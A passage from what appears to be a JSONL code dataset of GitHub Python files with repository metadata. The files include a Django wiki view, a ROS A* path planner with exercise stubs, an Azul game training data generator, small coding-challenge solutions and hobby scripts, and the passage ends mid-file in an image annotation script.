util.save_entry(form_title, form_content) # Make new entry\n return HttpResponseRedirect('wiki/' + form_title)\n else:\n return render(request, \"encyclopedia/createNewPage.html\", {\n \"form\": form\n })\n return render(request, \"encyclopedia/createNewPage.html\", {\n \"form\": EntryForm()\n })\n \ndef edit(request, page):\n if request.method == \"POST\":\n form = EditForm(request.POST)\n if form.is_valid(): # Server Side Validation\n form_content = form.cleaned_data['content']\n print('POST =' + form_content)\n util.save_entry(page, form_content) # Update entry\n return HttpResponseRedirect(reverse('entry', kwargs={'entry':page}))\n else:\n initial_dict = {\n \"title\" : page,\n \"content\" : util.get_entry(page)}\n return render(request, \"encyclopedia/editPage.html\",{\n \"form\" : form,\n \"entry\" : page\n })\n\n initial_dict = {\n \"title\" : page,\n \"content\" : util.get_entry(page)\n }\n print('GET = ' + initial_dict['content'])\n return render(request, \"encyclopedia/editPage.html\", {\n \"form\": EditForm(request.POST or None, initial = initial_dict),\n \"entry\" : page\n })\n\ndef random_page(request):\n pages = util.list_entries()\n random_page = random.choice(pages)\n return HttpResponseRedirect(reverse('entry', args=[random_page]))","repo_name":"Cheez1t/CS50-Project-1","sub_path":"encyclopedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3701089246","text":"\nfrom preprocessing import Preprocessing\nfrom verification import Caption\n\n\nif __name__ == '__main__':\n\n out_file_name = \"KEG_UP\" #出力フォルダ名\n negtive_num = 75 #不正解画像数\n stage_num = 30 #学習回数\n\n def_ng = True #既存の不正解画像を使用\n finish = False #一つのフォルダにまとめる\n\n pre = Preprocessing( out_file_name, def_ng=def_ng, finish=finish )\n pre.main( neg_num=negtive_num, stage_num=stage_num )\n\n Caption( pre.abs_path + pre.out_name )\n","repo_name":"IceSeeds/myCascade","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1786987464","text":"import bz2\nimport pathlib\n\nimport dill as pickle\nimport pandas as pd\n\n\nif __name__ == '__main__':\n \"\"\"\n This script builds a dataframe summarizing the relevant events\n The dataframe is pickled, so it can later be used to loop through the relevant events\n \n If you only want to process a sub-set of the events in the database, use a flag\n \"\"\"\n\n file_name = \"event_summary\"\n\n column_names = [\"SD_station\", # 3 char radar identifier e.g. \"rkn\"\n \"RISR_station\", # 3 char radar identifier e.g. \"ran\" # Note: RISR-N = \"ran\"\n \"year\",\n \"month\",\n \"day\",\n \"start_hour_UT\", # int\n \"end_hour_UT\", # int\n\n # flags\n \"for_vel_hist\"\n ]\n df = pd.DataFrame(columns=column_names)\n\n \"\"\" # Insert events below # \"\"\"\n\n # Notes:\n df = df.append({'SD_station': \"rkn\",\n 'RISR_station': \"ran\",\n 'year': 2011,\n 'month': 11,\n 'day': 11,\n 'start_hour_UT': 16,\n 'end_hour_UT': 22,\n\n 'for_vel_hist': 1,\n }, ignore_index=True)\n\n # Notes:\n df = df.append({'SD_station': \"rkn\",\n 'RISR_station': \"ran\",\n 'year': 2011,\n 'month': 11,\n 'day': 12,\n 'start_hour_UT': 18,\n 'end_hour_UT': 21,\n\n 'for_vel_hist': 1\n }, ignore_index=True)\n\n # Notes:\n df = df.append({'SD_station': \"rkn\",\n 'RISR_station': \"ran\",\n 'year': 2011,\n 'month': 11,\n 'day': 14,\n 'start_hour_UT': 17,\n 'end_hour_UT': 21,\n\n 'for_vel_hist': 1\n }, ignore_index=True)\n\n # Notes:\n df = df.append({'SD_station': \"rkn\",\n 'RISR_station': \"ran\",\n 'year': 2012,\n 'month': 10,\n 'day': 15,\n 'start_hour_UT': 18,\n 'end_hour_UT': 20,\n\n 'for_vel_hist': 0\n }, ignore_index=True)\n\n\n # Save the dataframe to file\n loc_root = str(pathlib.Path().absolute())\n out_dir = loc_root + \"/data\"\n out_file = out_dir + \"/\" + file_name + \".pbz2\"\n print(\"Saving event summary as \" + out_file)\n with bz2.BZ2File(out_file, \"w\") as file:\n pickle.dump(df, file)\n\n","repo_name":"mrl280/Summer2021PythonWork","sub_path":"DataAnalysis/OneAndOneHalfHop/build_event_summary.py","file_name":"build_event_summary.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16128595880","text":"from selenium import webdriver\r\nfrom time import sleep\r\n\r\ndef getscreenshot():\r\n driver = webdriver.Firefox(executable_path=r'C:\\Users\\sabri\\Downloads\\geckodriver-v0.31.0-win64\\geckodriver.exe')\r\n driver.get('https://tan-janeczka-31.tiiny.site/')\r\n sleep(1)\r\n\r\n driver.get_screenshot_as_file(\"screenshot.png\")\r\n driver.quit()\r\n print(\"end...\")\r\n\r\ngetscreenshot()","repo_name":"kwakaflocka/getclocks","sub_path":"websitetopng.py","file_name":"websitetopng.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17777512073","text":"import numpy as np\n\n# Library packages needed\nfrom math import sqrt\nimport threading\nimport time\nfrom collections import deque\n\n# ROS API\nimport rclpy\nfrom rclpy.node import Node\nfrom rclpy.qos import QoSProfile, QoSHistoryPolicy, QoSReliabilityPolicy, \\\n QoSDurabilityPolicy\nfrom geometry_msgs.msg import Pose2D, PoseStamped, Quaternion\nfrom nav_msgs.msg import OccupancyGrid, Odometry, Path\nfrom sensor_msgs.msg import Image\nimport message_filters\n\n# Our utility functions\nimport ar_py_utils.utils as utils\nfrom ar_py_utils.LocalFrameWorldFrameTransformations import Point2D\nfrom tw06.Graph import Graph, MapPoint, SearchMethods\nfrom tw06.Graph import Node as GraphNode\n\n# Wether to use odometry (if True) or the localization pose (if False).\n# The \"USE_ODOM = True\" should be used only for initial tests, while you are\n# not running the localization algorithm.\nUSE_ODOM = True\n\n# If true, show/publish debug information\nDEBUG = True\n\n\nclass SearchAndPlanning(Node):\n '''\n Path generation using breadth-first, depth-first and A* search algorithms.\n It the path given a goal pose and the current robot pose.\n '''\n def __init__(self):\n '''\n Initializes the class instance.\n '''\n # Prevent simultaneous read/write to the class variables\n self.lock = threading.Lock()\n\n # Will hold the graph for the path search\n self.graph = None\n\n # Robot name(space)\n self.robot_name = 'robot_0'\n\n # Initialize the node itself\n super().__init__('search_and_planning')\n\n # Setup subscribers\n # Map\n # Since the map is only published when the map server starts, we need\n # to get the message that was last pubslihed, even if it as published\n # before we subscribed the topic. To enable that behavior so, we\n # specify the TRANSIENT_LOCAL Durability Policy.\n qos_profile = QoSProfile(\n history=QoSHistoryPolicy.KEEP_LAST, depth=1,\n reliability=QoSReliabilityPolicy.RELIABLE,\n durability=QoSDurabilityPolicy.TRANSIENT_LOCAL)\n self.sub_map = self.create_subscription(OccupancyGrid, '/map',\n self.map_cb, qos_profile)\n\n # Setup subscribers using a ApproximateTimeSynchronizer filter. We want\n # to get the estimated robot pose which is closest in time from the\n # published goal pose.\n # Setup odometry or pose subscriber, according to USE_ODOM\n if USE_ODOM: # Use odometry\n # Use odometry should be only until localization is fully working\n self.sub_pose = message_filters.Subscriber(\n self, Odometry, f'/{self.robot_name}/odom')\n else:\n # Estimated pose (from localization)\n self.sub_pose = message_filters.Subscriber(\n self, PoseStamped, f'{self.robot_name}/pose')\n # Goal pose\n self.sub_goal_pose = message_filters.Subscriber(\n self, PoseStamped, f'{self.robot_name}/goal_pose')\n # Joint callback\n ts = message_filters.ApproximateTimeSynchronizer(\n [self.sub_pose, self.sub_goal_pose], 5, 0.5)\n ts.registerCallback(self.goal_pose_cb)\n\n # Setup publishers\n if DEBUG:\n # We will use this \"color image\" for debuggning purposes\n self.dbg_img = None\n # Debug image showing the generated cells\n self.dbg_img_pub = self.create_publisher(\n Image, f'/{self.robot_name}/dbg_search', qos_profile)\n\n # Path publisher\n self.path_pub = self.create_publisher(Path,\n f'/{self.robot_name}/path', 1)\n\n @staticmethod\n def heuristic(current_position: MapPoint,\n goal_position: MapPoint) -> float:\n '''\n Compute the heuristic given the current position and the goal position.\n Returns the heuristic value.\n '''\n # Use Euclidean distance\n return sqrt((goal_position.x-current_position.x)**2 +\n (goal_position.y-current_position.y)**2)\n\n def map_cb(self, msg: OccupancyGrid):\n '''\n Receive an Occupancygrid type message with the map and store an\n internal copy of it.\n '''\n\n # Avoid simultaneous access to the graph\n with self.lock:\n # Store map information internally\n self.map_origin = msg.info.origin\n self.map_resolution = msg.info.resolution\n self.occgrid = np.reshape(np.asanyarray(msg.data),\n (msg.info.height, msg.info.width))\n # Create/initialize graph with occupancy grid.\n # The debug mode must be set to true to enable publishing the graph\n # image view for debugging purposes.\n self.graph = Graph(self.occgrid, debug_mode=DEBUG)\n if DEBUG:\n # Publish initial map/graph image view.\n self.graph.showGraph(self.dbg_img_pub,\n self.get_clock().now().to_msg(),\n 'map')\n self.get_logger().info('Got and stored local copy of the map')\n\n def goal_pose_cb(self, msg_curr_pose, # PoseStamped or Odometry\n msg_goal_pose: PoseStamped):\n '''\n Given a the robot current and target/goal poses, compute the path from\n the starting pose to the goal pose. We are only considering positions.\n '''\n\n # Do not continue if the repulsive potential was not yet\n # computed\n with self.lock:\n if self.graph is None:\n self.get_logger().warn(\n 'Got goal pose, but the map was not received yet!')\n return\n\n # Avoid simultaneous access to the map while searching\n self.lock.acquire()\n\n if USE_ODOM: # Get robot pose from the odometry message\n robot_pose = Pose2D(\n x=msg_curr_pose.pose.pose.position.x,\n y=msg_curr_pose.pose.pose.position.y,\n theta=utils.quaternionToYaw(\n msg_curr_pose.pose.pose.orientation))\n else: # Get the robot pose from the PoseStamped message\n robot_pose = Pose2D(\n x=msg_curr_pose.pose.position.x,\n y=msg_curr_pose.pose.position.y,\n theta=utils.quaternionToYaw(msg_curr_pose.pose.orientation))\n\n # Convert start and end poses to map positions (cell coordinates)\n start_position_px = utils.meter2cell(Point2D(x=robot_pose.x,\n y=robot_pose.y),\n self.map_origin,\n self.map_resolution)\n start_pt = MapPoint(start_position_px.x, start_position_px.y)\n goal_position_px = utils.meter2cell(\n Point2D(x=msg_goal_pose.pose.position.x,\n y=msg_goal_pose.pose.position.y),\n self.map_origin,\n self.map_resolution)\n goal_pt = MapPoint(goal_position_px.x, goal_position_px.y)\n\n # Perform the map search and, if successful, and DEBUG is active, show\n # the resulting path in the terminal output as text\n path = self.doSearch(start_pt, goal_pt, SearchMethods.A_STAR)\n if path is not None:\n # Show the last graph image view\n if DEBUG:\n self.get_logger().debug('Showing final searched map')\n self.graph.showGraph(self.dbg_img_pub,\n self.get_clock().now().to_msg(),\n 'map')\n time.sleep(2.0)\n self.get_logger().debug('Showing final path')\n self.graph.showPath(path, self.get_logger(), self.dbg_img_pub,\n self.get_clock().now().to_msg(), 'map')\n # Create the path message to be published\n path_to_publish = Path()\n path_to_publish.header.stamp = self.get_clock().now().to_msg()\n path_to_publish.header.frame_id = 'map' # TODO: use a parameter\n for node in path:\n # Convert from map coordinates to world coordinates\n curr_target = utils.cell2meter(Point2D(node.x, node.y),\n self.map_origin,\n self.map_resolution)\n # Add current target to the path\n pose = PoseStamped()\n pose.header.stamp = path_to_publish.header.stamp\n pose.header.frame_id = path_to_publish.header.frame_id\n # Store position\n pose.pose.position.x = curr_target.x\n pose.pose.position.y = curr_target.y\n pose.pose.position.z = 0.0\n # Store orientation\n pose.pose.orientation = Quaternion(x=0., y=0., z=0., w=1.0)\n # Add to the path\n path_to_publish.poses.append(pose)\n\n # Publish the path\n self.path_pub.publish(path_to_publish)\n\n else:\n self.get_logger().warn(\n 'There is no solution for the specified problem!')\n\n # We are done, reset the graph\n self.graph = Graph(self.occgrid, debug_mode=DEBUG)\n\n # Release lock, since we no longer need access to the shared data\n self.lock.release()\n\n def doSearch(self, start_position: MapPoint, goal_position: MapPoint,\n search_type: SearchMethods) -> bool:\n '''Perform search on a graph.\n Returns true if the solution was found.'''\n\n # Set the graph goal position\n self.graph.setGoalPosition(goal_position)\n\n # Create root node at the given start position and add it to the graph\n # map_graph - graph this node belongs to\n # None - no parent\n # 0 - no cost\n # heuristic function\n # start_position\n # None - no action needed to reach this node\n root = GraphNode(self.graph, None, 0, self.heuristic,\n start_position, None)\n self.graph.addNode(root, True)\n\n # This variable will get true if we find a solution, i.e., a path from\n # the start position to the goal\n solutionFound = False\n\n # Output debug line\n self.get_logger().info(\n ' ----> Performing path-planning search in a grid-based map:')\n\n # List of nodes which were already generated but not yet explored.\n nodesToExplore = deque()\n\n # Add the root node to the nodes that were already generated, but not\n # yet explored. This will be the first to expanded.\n nodesToExplore.append(root)\n\n # Keep expanding nodes until we found a solution (a path from start\n # position to the goal position), or until there are no more nodes to\n # explore.\n while (len(nodesToExplore) > 0):\n # Get the first node on the list of nodes to be explored (the node\n # is also removed from the list of nodes to be explored)\n node = nodesToExplore.popleft()\n\n # Check if the current node is the solution, that is, if its\n # position corresponds to the goal position. If so, the search ends\n # now.\n if ((node.map_position_.x == goal_position.x) and\n (node.map_position_.y == goal_position.y)):\n # We found the solution, leave...\n solutionFound = True\n break\n\n # Expand node by generating all its children, stored in the\n # newNodes variable.\n newNodes = node.expand()\n\n # Add the new nodes to the list of nodes that were already\n # generated but not yet explored.\n if (search_type == SearchMethods.DEPTH_FIRST):\n ###############################################################\n # Put code here to update nodesToExplore (Depth-first search)\n ###############################################################\n pass # REPLACE ME\n\n ###############################################################\n elif (search_type == SearchMethods.BREADTH_FIRST):\n ###############################################################\n # Put code here to update nodesToExplore (Breadth-first search)\n ###############################################################\n pass # REPLACE ME\n\n ###############################################################\n elif (search_type == SearchMethods.A_STAR):\n # Add the nodes such that the ones with lowest total cost are\n # in the beggining.\n for new_node in newNodes:\n # Look for the node with higher total cost than this one,\n # and insert the new node before that node.\n # This could be done in a more efficient way!\n i = 0\n while i < len(nodesToExplore):\n if (nodesToExplore[i].total_cost_ >\n new_node.total_cost_):\n break\n else:\n i += 1\n nodesToExplore.insert(i, new_node)\n\n # Show map with search information debugging purposes\n if DEBUG:\n self.graph.showGraph(self.dbg_img_pub,\n self.get_clock().now().to_msg(),\n 'map')\n\n # If a solution was found, return the corresponding path, else, return\n # None.\n if solutionFound:\n finalPath = deque()\n # Get goal node\n node = self.graph.nodes_list_[goal_position.label]\n # Cycle through all available nodes starting from the goal to the\n # start node.\n while (True):\n finalPath.appendleft(node.map_position_)\n # get this node parent\n node = node.parent_\n # If this new node is our start position, i.e., it is our root,\n # we are finished\n if (node == self.graph.root_):\n finalPath.appendleft(node.map_position_)\n break\n return finalPath\n else:\n return None\n\n\ndef main(args=None):\n '''\n Main function.\n '''\n\n # Output usage information\n print('Search and Planning-based path generation\\n' +\n '--------------------------------------\\n')\n\n # Initiate python ROS Python control\n rclpy.init(args=args)\n\n # Create our navigation node\n node = SearchAndPlanning()\n\n # Get the node executing\n rclpy.spin(node)\n\n # Cleanup memory and shutdown\n node.destroy_node()\n rclpy.shutdown()\n\n\n'''\nThis is what is actually called when we run this python script. It then calls\nthe main function defined above.\n'''\nif __name__ == '__main__':\n main()\n print('Quitting...')\n","repo_name":"ipleiria-robotics/adv_robotics","sub_path":"src/tw06/tw06/search_and_planning.py","file_name":"search_and_planning.py","file_ext":"py","file_size_in_byte":15211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17281419581","text":"class Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n '''\n :\\1. Algo. 1, BF with accumulated sum array, \n : TC: O(n^2), 201 / 209 test cases passed, Status: Time Limit Exceeded\n : SC: O(1) except nums, \n '''\n \n n = len(nums)\n max_res = -10**5\n \n for i in range(1, n):\n nums[i] += nums[i-1]\n nums = [0] + nums\n \n for i in range(n):\n for j in range(i+1, n+1):\n s = nums[j] - nums[i]\n if s > max_res:\n max_res = s\n \n return max_res\n \n \n# need to check out other algorithm solutions. \n","repo_name":"loganchen39/Leetcode_2022","sub_path":"src/Easy/0053.E.MaximumSubarray.py","file_name":"0053.E.MaximumSubarray.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7151301915","text":"import glob\nimport random\nimport tensorflow as tf\nimport numpy as np\nimport struct\n\nNUM_PLANES = 49\nIMG_SIZE = 5\nNUM_MOVES = 180\nSTATE = \"30s5sB10s10sIIBBBBb720sb\"\n\nclass Generator(tf.keras.utils.Sequence):\n def __init__(self, inputdir, shuffle, batchsize):\n self.record_struct = struct.Struct(STATE)\n self.shuffle = shuffle\n self.batch_size = batchsize\n self.records = []\n\n # load all games into memory (~56K per game) and store them per record\n # for optimal shuffling.\n filenames = glob.glob(str(inputdir) + \"/*.bin\")\n recordsize = self.record_struct.size\n for name in filenames:\n with open(name, \"rb\") as f:\n data = f.read()\n n = len(data)\n assert n % recordsize == 0\n for i in range(0, n, recordsize):\n self.records.append(data[i:i+recordsize])\n print(f\"Loaded {len(self.records)} records shuffle:{shuffle}\")\n\n\n def __iter__(self):\n if self.shuffle:\n random.shuffle(self.records)\n return self\n\n\n def __len__(self):\n return len(self.records) // self.batch_size\n\n\n def __getitem__(self, index):\n x, y = [], ([], [])\n for i in range(self.batch_size):\n s, p, z = self._create_planes(self.records[index * self.batch_size + i])\n x.append(s)\n y[0].append(p)\n y[1].append(z)\n return np.transpose(np.array(x), [0, 2, 3, 1]), (np.array(y[0]), np.array(y[1]))\n\n\n def on_epoch_end(self):\n if self.shuffle:\n random.shuffle(self.records)\n\n\n def _create_planes(self, data):\n \"\"\"\n 1 + 1 + 5 + 5*4 + 15 + 1 + 1 + 1 + 1 + 1 + 1 + 1 = 49\n | | | | | | | | | | | |\n | | | | | | | | | | | them floor: v in {0,...,7}\n | | | | | | | | | | them wall: v in {0, 1}\n | | | | | | | | | them left: v in {0,...,5}\n | | | | | | | | us floor: v in {0,...,7}\n | | | | | | | us wall: v in {0, 1}\n | | | | | | us left: v in {0,...,5}\n | | | | | 1st tile: v in {-1, 0, 1}\n | | | | center: v in {0,...,5}\n | | | factories: v in {0,...,5}\n | | bag: v in {0,...,20}\n | them score: v in {0,...,255}\n us score: v in {0,...,255}\n\n All planes are normalized between [0, 1]\n \"\"\"\n c, b, t, l1, l2, w1, w2, f1, f2, s1, s2, f, probs, winner = self.record_struct.unpack(data)\n\n # make sure that the player who's turn it is, is always player 1. This\n # ensures we create the planes from the current player's perspective.\n if t == 1:\n l1, l2 = l2, l1\n w1, w2 = w2, w1\n f1, f2 = f2, f1\n s1, s2 = s2, s1\n\n # create buffer\n planes = np.zeros((NUM_PLANES, IMG_SIZE, IMG_SIZE), dtype=np.float32)\n\n # scores\n index = 0\n planes[index, :, :] = s1 / 255\n index += 1\n planes[index, :, :] = s2 / 255\n index += 1\n\n # bag\n for i in range(5):\n planes[index, :, :] = b[i] / 20\n index += 1\n\n # factories\n for i in range(5):\n tiles = struct.unpack(\"BBBBB\", c[i*5:i*5+5])\n empty = 4\n for tile, n in enumerate(tiles):\n for _ in range(n):\n planes[index, :, :] = (tile + 1) / 5\n empty -= 1\n index += 1\n for _ in range(empty):\n index += 1\n\n # center\n tiles = struct.unpack(\"BBBBB\", c[25:])\n empty = 15\n for tile, n in enumerate(tiles):\n for _ in range(n):\n planes[index, :, :] = (tile + 1) / 5\n empty -= 1\n index += 1\n for _ in range(empty):\n index += 1\n\n # first tile\n planes[index, :, :] = (f + 1) / 2\n index += 1\n\n # p1 left\n for i in range(5):\n tile, n = struct.unpack(\"BB\", l1[i*2:i*2+2])\n for j in range(n):\n planes[index, i, j] = (tile + 1) / 5\n index += 1\n\n # p1 wall\n for i in range(5):\n for j in range(5):\n n = 24 - (i * IMG_SIZE + j)\n planes[index, i, j] = (w1 >> n) & 1\n index += 1\n\n # p1 floor\n planes[index, :, :] = f1 / 7\n index += 1\n\n # p2 left\n for i in range(5):\n tile, n = struct.unpack(\"BB\", l2[i*2:i*2+2])\n for j in range(n):\n planes[index, i, j] = (tile + 1) / 5\n index += 1\n\n # p2 wall\n for i in range(5):\n for j in range(5):\n n = 24 - (i * IMG_SIZE + j)\n planes[index, i, j] = (w2 >> n) & 1\n index += 1\n\n # p2 floor\n planes[index, :, :] = f2 / 7\n index += 1\n\n assert index == NUM_PLANES\n\n return planes, np.frombuffer(probs, dtype=np.float32), np.float32(winner)\n","repo_name":"Error323/a0a","sub_path":"training/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42779604091","text":"import random\n\nclass Kitten:\n\n def __init__(self, name):\n self.name = name\n self.happiness = 20\n self.satiety = 0\n self.age = 1\n self.alive = True\n self.kitten = True\n self.cat = False\n\n def to_chill(self):\n print(\"Time to chill\")\n self.happiness += 3\n self.age += 0.5\n self.satiety -= 0.1\n\n def to_eat(self):\n print(\"Time to eat\")\n self.happiness += 5\n self.age += 0.5\n self.satiety += 2\n\n def to_play(self):\n print(\"Time to play\")\n self.happiness += 2\n self.age += 0.5\n self.satiety -= 1\n\n def to_sleep(self):\n print(\"Time to sleep\")\n self.happiness += 2\n self.age += 0.5\n self.satiety -= 0.2\n\n def to_run(self):\n print(\"Time to run\")\n self.happiness -= 1\n self.age += 0.5\n self.satiety -= 3\n\n def is_kitten(self):\n if self.satiety < -0.2:\n print(\"Give me some milk...\")\n self.kitten = False\n self.cat = False\n elif self.happiness <= 3:\n print(\"Need a new family...\")\n self.kitten = False\n self.cat = False\n elif self.age > 2:\n print(\"Become a cat...\")\n self.kitten = False\n self.cat = True\n\n def end_of_day(self):\n print(f\"happiness = {self.happiness}\")\n print(f\"satiety = {self.satiety}\")\n print(f\"age = {self.age}\")\n\n def live(self, day):\n day = \"Day\" + str(day) + \"Of\" + self.name + \"Life\"\n print(f\"{day:=^50}\")\n live_cube = random.randint(1, 5)\n if live_cube == 1:\n self.to_chill()\n elif live_cube == 2:\n self.to_eat()\n elif live_cube == 3:\n self.to_play()\n elif live_cube == 4:\n self.to_sleep()\n elif live_cube == 5:\n self.to_run()\n self.end_of_day()\n self.is_kitten()\n\nmasya = Kitten(name=\"Masya\")\n\nfor day in range(365):\n if masya.alive == False:\n break\n masya.live(day)\n\n","repo_name":"Nyuta14/lesson_1","sub_path":"homework_2/2_2.py","file_name":"2_2.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8465515027","text":"import json\nimport sys\nimport os\n\n################################################################################\n\n#Temporary Class to put raw data from json to python object\nclass ObjStruct():\n def __init__(self, **entry):\n self.__dict__.update(entry)\n\n\n#Class to make the json nodes usuable node objects\nclass BasicNode(object):\n\n def __init__(self, Node_id, x_cord, y_cord, connected_nodes):\n self.Node_id = Node_id\n self.x_cord = x_cord\n self.y_cord = y_cord\n self.connected_nodes = connected_nodes\n self.end_node = False\n self.distance_from_start = sys.maxsize\n\n def update_end_node(self, update_end_node):\n self.end_node = update_end_node\n\n\n#Class to put the parsed data that can be used in the algorithm\nclass DANode(object):\n\n def __init__(self, Node_id):\n self.Node_id = Node_id\n self.connected_nodes = []\n self.distance_from_start = sys.maxint\n\n def add_connected(self, connected, weight):\n self.connected_nodes[connected] = weight\n\n################################################################################\n\n\nif __name__ == \"__main__\":\n\n #setup of some variables\n nodesArray = []\n\n os.system('CLS')\n print(\"###########################################\\n\")\n filename = input(\"Name of the json file with objects you would like converted: \")\n try:\n\n #Receiving the data\n with open(filename, \"r\") as file:\n #Loading data from json file\n raw_data = json.load(file)\n\n #turning the json object into a usable python dictionary\n NodesObject = ObjStruct(**raw_data)\n\n total_BasicNodes_var = len(NodesObject.Nodes)\n\n #putting the nodes into the unvisited array\n for i in range(total_BasicNodes_var):\n temperary_dict = ObjStruct(**NodesObject.Nodes[i])\n temp_node = BasicNode(temperary_dict.Node_id, temperary_dict.x_cord, temperary_dict.y_cord, temperary_dict.connected_nodes)\n nodesArray.append(temp_node)\n\n except FileNotFoundError:\n print(\"File not found, try again. Reminder the name is caps sensitive.\")\n\n################################################################################\n\n os.system('CLS')\n print(\"###########################################\\n\")\n print(\"Now you can search for any info about any of the nodes in this list.\")\n #Nodes databased\n DNodes_ids = []\n #String to print the nodes\n PNodes_ids = \"\"\n for i in range(len(nodesArray)):\n DNodes_ids.append(nodesArray[i].Node_id)\n PNodes_ids += str(nodesArray[i].Node_id) + \" | \"\n print(\"- The IDs of the Nodes in the file are: \" + PNodes_ids)\n print(\"- You can then find out the different properties of each using any of the commands below\")\n\n print(\"- The commands that can be used are, coordinates (x,y), and connected (nodes). After typing these commands\\n- you will be prompted with which node to search\\n- REMEMBER THESE COMMANDS ARE CASE SENSITIVE!!!\\n\")\n print(\"###########################################\\n\")\n\n x = input(\"\")\n x = x.split(\" \")\n while x[0] != \"exit program\":\n if x[1] == \"coordinates\":\n l = DNodes_ids.index(int(x[0]))\n print(str(nodesArray[l].x_cord) + \", \" + str(nodesArray[l].y_cord))\n\n elif x[1] == \"connected\":\n l = DNodes_ids.index(int(x[0]))\n print(str(nodesArray[l].connected_nodes))\n\n else:\n print(\"That command was not recognised, if you do not rememeber the commands they are above.\")\n\n x = input()\n x = x.split(\" \")\n\n\n################################################################################\n","repo_name":"BlakeChiera/SearchingJsonNodes","sub_path":"SearchJsonNodesCode.py","file_name":"SearchJsonNodesCode.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"75432718590","text":"import cv2 as cv\nimport os\n\ndef load_images_from_folder(folder):\n\n images = []\n for filename in os.listdir(folder):\n img = cv.imread(os.path.join(folder,filename))\n if img is not None:\n #print(\"image!\")\n images.append(img)\n return images\n \n\ndef folderFind(rootdir, index, subindex):\n\n images = []\n\n for dirs in os.listdir(rootdir):\n \n if index == 0:\n \n subdirs = os.path.join(rootdir, dirs)\n \n images = load_images_from_folder(subdirs + \"/MID\" + str(subindex))\n \n index = index - 1\n \n return images\n \ndef getCSV(rootdir, index):\n\n for dirs in os.listdir(rootdir):\n \n if index == 0:\n \n csv = open(rootdir + '/' + dirs + '/mid.csv', 'rb')\n \n #print dirs\n \n index = index - 1\n \n return csv\n \nrootdir = '/Users/quero/Desktop/ML/SemesterProject/FIDs_NEW'\n\n\n#print csv\n#print data\n#print(images)\n","repo_name":"yuanyangxin/Kinship-Prediction","sub_path":"fileFinder.py","file_name":"fileFinder.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34665246069","text":"from resource_management.presenters.presenter_implementation import \\\n PresenterImplementation\nfrom resource_management.dtos.dtos import ItemDto\n\n\ndef test_get_item_details_response(item_dto):\n\n #Arrange\n\n expected_item_dict = {\n 'item_id': 1,\n 'title': 'item1',\n 'resource_name': 'github',\n 'description': 'item_description',\n 'link': 'https://item1'\n }\n\n presenter = PresenterImplementation()\n\n #Act\n actual_item_dict = presenter.get_item_details_response(\n item_dto=item_dto\n )\n\n #Assert\n assert actual_item_dict == expected_item_dict\n","repo_name":"Ganga-Prathap/resource_management","sub_path":"resource_management/tests/presenters/test_get_item_details_response.py","file_name":"test_get_item_details_response.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5086137806","text":"def solution(id_list, report, k):\n answer = []\n reported_dict = {id: {'reporter': set(), 'mail_cnt': 0} for id in id_list}\n\n for r in report:\n reporter, reported_person = r.split(' ')\n reported_dict[reported_person]['reporter'].add(reporter)\n\n for key, val in reported_dict.items():\n if len(val['reporter']) >= k:\n for reporter in reported_dict[key]['reporter']:\n reported_dict[reporter]['mail_cnt'] += 1\n\n for val in reported_dict.values():\n answer.append(val['mail_cnt'])\n return answer\n\n\nprint(\n solution([\"muzi\", \"frodo\", \"apeach\", \"neo\"], [\"muzi frodo\", \"apeach frodo\", \"frodo neo\", \"muzi neo\", \"apeach muzi\"],\n 2))\n","repo_name":"deok2kim/algorithm","sub_path":"프로그래머스/2022 KAKAO BLIND RECRUITMENT/신고 결과 받기.py","file_name":"신고 결과 받기.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29522111329","text":"def run():\r\n '''\r\n Reto 25: Utiliza la lista de compras del reto anterior para\r\n construir una cadena con saltos de línea sin usar ciclos\r\n '''\r\n shop_list = ['noodles', 'garlic', 'chili', 'tomatoes', 'butter', 'ginger', 'flour']\r\n txt_sep = '\\n'.join(shop_list)\r\n \r\n print(txt_sep) \r\n \r\nif __name__ == '__main__':\r\n run()","repo_name":"HaroldRoy/100-Days-of-Python","sub_path":"25_join.py","file_name":"25_join.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15653057679","text":"import os\nimport json\nimport argparse\nimport cv2\nimport imagesize\nfrom tqdm import tqdm\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n \"--data-path\",\n help=\"path to a folder containing the images\",\n default=\"data/test1\",\n)\nparser.add_argument(\n \"--images-path\",\n help=\"path to a folder containing the images\",\n default=\"segmentation_images\",\n)\nparser.add_argument(\n \"--masks-path\",\n help=\"path to the annotations\",\n default=\"segmentation_masks\",\n)\n\nargs = parser.parse_args()\nargs.images_path = os.path.normpath(args.images_path)\nargs.masks_path = os.path.normpath(args.masks_path)\n\n\ndef generate_vgg_annotation(image_path, segmentation_mask_path):\n segmentation_mask = 